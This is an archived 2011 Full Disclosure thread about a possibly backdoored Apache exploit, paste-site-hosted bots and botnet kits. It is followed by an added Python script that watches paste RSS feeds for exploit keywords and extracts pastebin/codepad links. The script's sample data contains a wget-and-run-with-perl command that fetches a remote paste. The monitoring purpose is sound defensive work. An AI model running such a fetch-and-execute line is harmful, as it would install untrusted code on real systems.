Full Disclosure mailing list archives

Re: Apache 2.2.17 exploit?


From: Darren Martyn <d.martyn.fulldisclosure () gmail com>
Date: Tue, 4 Oct 2011 10:43:25 +0100

Adam, thanks for the tip on Codepad, I am very grateful.

Is there actually a non backdoored variant of said code? I have not seen any
CVE mentioning that exploit so I was naturally wondering.

Also, pastebin/pastee based bots (those scanner kits especially) are not too
uncommon, I have found more than a few.

I was working on dissecting "kanbe.tar.gz" from madirish.net when my
hardware "vanished"; very interesting kit. I have a special place in my
heart for those things, because one can easily find the botnet's owners and
report to their ISP (or whatever) or simply observe it (see how big it is).
During the time after Kingcope's EXIM remote root exploit was released I saw
a few kits appear, the first an energymech mod with a scanner and "spreading"
exploit, another a self-contained Perl script that spread itself a la worm.
Within the following months more of the kits appeared, including the ones
that have various "x" and "x2" shell scripts that simply pass args and such
to other scripts - fuck ugly things!

I wonder though, when someone will write some kind of "serious" worm for
*nix servers, some kind of self-propagating, multiple spread/infection
method worm, that infects, roots, and iFrames the whole site with malware
spreading nastiness, along with whatever else the evil f*ckers want "roots"
for. Something like Scalper except a bit nastier. Will be a fun day for
malware dissection :)

On Tue, Oct 4, 2011 at 12:22 AM, xD 0x41 <secn3t () gmail com> wrote:

There are places like codepad.org that let you compile/execute various


Indeed, I have seen the codepad.org execute action used on many, many bots,
even on pastebin just using download= and renaming the downloaded file :s not
too hard; don't even need to rename the file, and the raw= feature is plain code
just in a txt.
On codepad though, you can actually execute the code on the server, and that's
awesome for debugging I guess, but I prefer to use my own stdinout.
Anyhow, it is a nice world there, that is where half the bots in use sit...
you should find some of the more popular bots, and strings, and watch
how many are active... many would be, believe it. Especially on pastebin and
codepad, those two are best because they allow raw download.. but codepad
even allows you to set up a subdomain, which was removed from pastebin,
unf..
Oh well, that's how it is, it is ok by me.
xd



On 4 October 2011 07:14, adam <adam () papsy net> wrote:

Darren,

There are places like codepad.org that let you compile/execute various
programming/scripting languages, of course you don't have the control/access
that you'd normally have but for some things - it may just be enough.

On Mon, Oct 3, 2011 at 11:41 AM, Darren Martyn <
d.martyn.fulldisclosure () gmail com> wrote:

I may have to set up such an RSS + REGEX along with a google alerts to
get the best of both :)

Since my lack of computing facilities has gotten worse in the last month
I have actually begun to forget ASM, so decoding shellcode is not so easy
for me :(
Nor do I have (currently) access to a Linux box to test it on - only a
friend's W7 laptop (which wants to use Cyrillic) and the college computers
(W7 also... Network booting with Novell, buggy and slow for the win!)

I will keep on posting anything that looks even mildly interesting, may
find something fun in my travels :)


On Mon, Oct 3, 2011 at 5:05 PM, PsychoBilly <zpamh0l3 () gmail com> wrote:

OMG!
This ...
actually WORKS!
GR8 Job, m8+!
L33+ cC l33+
W00+ FB Bwana!
...
<! connection reseted by peer >

[[   adam   ]] @ [[   03/10/2011 17:56 ]]--------------------------------------------------
Also, make sure you guys don't miss out on this 0day either:
http://pastebin.com/R8XdsUgK


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
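The "RSS + REGEX" paste-site watcher Darren mentions, combined with the pastebin/codepad staging links xD describes, as an added Python example. This is not code from the thread or from any kit named in it. The RSS feed, paste IDs, links and the raw.php?i= paths are constructed sample data, and the keyword patterns are assumptions chosen to match the exploits the thread talks about.

```python
"""Keyword watch over a paste-site RSS feed with paste-URL extraction.

Added example, not from the Full Disclosure thread. The feed below is
constructed sample data; every ID, link and path in it is hypothetical.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Set

# Constructed sample feed (hypothetical pastes, IDs and URLs; not real data).
SAMPLE_RSS = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel><title>sample paste feed</title>
<item><title>apache 2.2.17 0day</title><guid>abc123</guid>
 <link>http://paste.example/abc123</link>
 <description>wget http://pastebin.com/raw.php?i=Qz9abc -O x; perl x</description></item>
<item><title>homework</title><guid>def456</guid>
 <link>http://paste.example/def456</link>
 <description>print("hello")</description></item>
<item><title>exim spreader v2</title><guid>ghi789</guid>
 <link>http://paste.example/ghi789</link>
 <description>get http://codepad.org/Kx7y2Ab then http://pastebin.com/raw.php?i=Qz9abc</description></item>
<item><title>apache 2.2.17 0day</title><guid>abc123</guid>
 <link>http://paste.example/abc123</link>
 <description>repost</description></item>
</channel></rss>"""

# Assumed keyword patterns; tune to whatever you are hunting for.
DEFAULT_KEYWORDS: Sequence[str] = (r"\bapache\b", r"\bexim\b", r"0day", r"remote\s+root")

# The two paste hosts the thread names; path runs up to whitespace or a quote.
PASTE_URL_RE = re.compile(
    r"https?://(?:www\.)?(?:pastebin\.com|codepad\.org)/[^\s\"'<>]+", re.IGNORECASE)


@dataclass(frozen=True)
class Entry:
    guid: str
    title: str
    link: str
    description: str


def parse_feed(xml_text: str) -> List[Entry]:
    """Parse RSS 2.0 <item>s; missing children become empty strings,
    and an item without a <guid> falls back to its <link> as identity."""
    root = ET.fromstring(xml_text)
    entries = []
    for item in root.iter("item"):
        text = {tag: (item.findtext(tag) or "").strip()
                for tag in ("guid", "title", "link", "description")}
        entries.append(Entry(text["guid"] or text["link"], text["title"],
                             text["link"], text["description"]))
    return entries


def extract_paste_urls(text: str) -> List[str]:
    """Distinct pastebin/codepad URLs in first-seen order."""
    return list(dict.fromkeys(m.group(0) for m in PASTE_URL_RE.finditer(text)))


def triage(xml_text: str, keywords: Sequence[str] = DEFAULT_KEYWORDS,
           seen: Optional[Set[str]] = None) -> List[Dict]:
    """Return not-yet-seen entries whose title or body matches a keyword
    pattern, each with the paste URLs found in its body. Pass the same
    `seen` set on every poll so repeats and reposts are reported once."""
    seen = set() if seen is None else seen
    patterns = [re.compile(k, re.IGNORECASE) for k in keywords]
    hits = []
    for entry in parse_feed(xml_text):
        if entry.guid in seen:
            continue
        seen.add(entry.guid)
        haystack = f"{entry.title}\n{entry.description}"
        matched = [p.pattern for p in patterns if p.search(haystack)]
        if matched:
            hits.append({"guid": entry.guid, "title": entry.title, "link": entry.link,
                         "keywords": matched,
                         "paste_urls": extract_paste_urls(entry.description)})
    return hits


if __name__ == "__main__":
    state: Set[str] = set()
    for hit in triage(SAMPLE_RSS, seen=state):
        print(hit["guid"], hit["keywords"], hit["paste_urls"])
    print("second poll:", triage(SAMPLE_RSS, seen=state))  # nothing new
```

Pointing this at a live feed only needs the fetch step swapped in; the state set is what turns it from a one-shot grep into a watcher, and the extracted URLs are the list you would then feed to strings/VirusTotal/abuse reports rather than clicking.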